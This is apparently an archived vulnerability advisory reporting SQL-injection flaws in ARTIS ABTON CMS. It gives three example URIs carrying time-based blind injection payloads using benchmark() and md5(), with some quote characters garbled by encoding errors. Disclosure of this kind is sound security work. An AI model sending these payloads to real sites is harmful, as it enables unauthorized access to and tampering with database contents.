13 lines
No EOL
639 B
Text
13 lines
No EOL
639 B
Text
source: https://www.securityfocus.com/bid/38658/info
|
|
|
|
ARTIS ABTON CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
The following example URIs are available:
|
|
|
|
http://www.example.com/rus/details/â??+benchmark(10000,md5(now()))+â??/
|
|
|
|
http://www.example.com/rus/referaty/1'+benchmark(10000,md5(now()))-â??1/
|
|
|
|
http://www.example.com/rus/â??+benchmark(10000,md5(now()))+â??/ |